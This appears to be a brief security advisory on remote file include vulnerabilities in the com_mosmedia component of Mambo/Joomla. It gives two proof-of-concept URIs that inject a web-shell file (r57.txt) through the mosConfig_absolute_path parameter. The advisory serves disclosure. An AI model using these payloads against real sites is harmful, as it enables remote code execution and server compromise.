Mambo/Joomla Com_Mosmedia MosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities

Mambo/Joomla Com_Mosmedia MosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=r57.txt?
http://www.example.com/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=r57.txt?